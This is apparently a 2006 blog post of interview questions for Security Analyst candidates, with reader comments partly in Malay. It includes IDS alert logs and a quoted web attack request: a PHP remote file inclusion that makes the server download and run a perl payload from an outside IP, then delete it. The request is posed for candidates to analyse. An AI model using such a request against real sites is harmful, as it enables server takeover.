work and IT @ 28 Nov 2006 01:23 am by ayoi
Conducted an interview session for few Security Analyst posts to be stationed at The Client site this morning. For today session, there were 4 candidates which at 1st I hope will be better than the last batch that I’ve interviewed for quite some times ago. These candidates were the one who passed the assessment test that they sat last friday morning. For those who wants to know what kind of question to be asked if I were the interviewer, below are those questions.
p/s: You’ll discover that most of the questions are not too details because mainly I’m looking for the ones who have sound security fundamental knowledge. (Btw most of the candidates will only “lopong/ternganga/tersengih” when asked lil bit detailed question such as why IPS is different from conventional firewall?-I know this is not a detailed question)
1) I would ask you to introduce yourself (Education background, family, skills etc)
-I would like to point out that most of the candidates tend to concentrate on their education background, family background, hobby etc but so far only few did mention their experience, knowledge, skills, interest, your goals, purpose of applying the job. So next time please remember that the interviewer wants to know how u expressing urself (for communication evaluation), your objectives, vision, mission of joining the company and others instead of knowing whut ur favourite meals, favourite colors, hobby and any other unrelated matters.
2). To test your basic security knowledge, the question would be either
a) What is your opinion regarding network security? or
b) What do you understand about ICT Security as a whole? or
c) In order to preserve the risk to the acceptable level, what do you think that would be a good security process practice?
3) What do you know about Security Analyst?(This question is regarding the post)
- I do expect that all the candidates at least do some research from the internet. It sounds ridiculous if yourself don’t even know about the job that you want to apply. Ever heard of google before?
4)What do you know about IDS? (Because we are using IDS)
a) Different between IDS and IPS
b) Experience/ hands-on training of using any IDS
c) Understand the mechanism of the IDS
d) Able to read/interprate/understand the signatures/rules. *Bonus
e) IDS Deployment *Bonus as well 
)
5) Only 2 questions. (I made some modifications and if you do noticed about the odd
[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0×10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0×99984D5A Win: 0×5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3.53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0×10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0×99984D5A Win: 0×5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
Info on 23.143.3.3
HTTP/1.1 200 OK
Date: Sat, 17 June 2006 19:34:48 GMT
Server: Apache/2.2.0 (Unix)
Last-Modified: Sun, 09 Jul 2006 17:43:47 GMT
ETag: “20003-39aa-41829a3c27ac0″
Accept-Ranges: bytes
Content-Length: 14762
Cache-Control: max-age=86400
Expires: Sun, 16 Jul 2006 19:34:48 GMT
Content-Type: text/htm
What do u think about those alerts above?
and the other question would be :
/2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/
memberz/travma;perl%20travma;rm%20-rf%20travma?
HTTP/1.0
What is/are the intention of the attacker?
What are the conditions that the attacker needs to know about the system in order to make sure that his attack is successful?
So that’s it. Hehehe. Anyway those questions are the basic questions. So from time to time based on your answer, perhaps we can venture lil bit further. Any comments on this questions? perhaps u can give more constructive questions as well.
arr apekah
It’s good to see interviewer who actually asks real things when hiring security analyst.
Check ID returned and remote code execution through vulnerable php cms
Cheers dude
boleh tak provide the answers for the questions? i drafted my own answers but will like to compare it with the actual answer from the interviewer la. bolehla tambah knowledge skit. bagi answer briefly pun boleh as long as i can understand. tx
Baca kat bawah tentang ict bukan itu aje manager akan bertanya macam mana nak handle user yang kiasu atau kalang kabut semua nak cepat. Satu nya manager suka tanya “If there is a urgency work boleh datang office balik kalau server down walaupun ada colleague jatuh sakit dan awak bukan stand by?” Perhatian: Manager akan test tentang team work.
Jangan marah kalau saya tegur sedikit ada kalanya orang muda terlalu lokek nak share information tentang manual IT. Macam ditempat kerja saya , saya kena main tarik tarik tali. Kawan sekerja saya ini cina dan amat lokek tentang informasi IT. Nak mintak information dekat dia macam mintak duit kena pandai buat baik.
http://www.bsi-global.com/ICT/Security/faqs.xalter
[...] Requirement – Know whut the hell is IDS (And to one particular candidate from one technology university from south, IDS is not a firewall and it is definitely not a policy system of segmenting our network by using VLAN for security purpose) [...]
fuhh.. sempoi la!
hi nice site.
hi all.
Intentionnya ialah command prompt / cmd.
Betul ke ??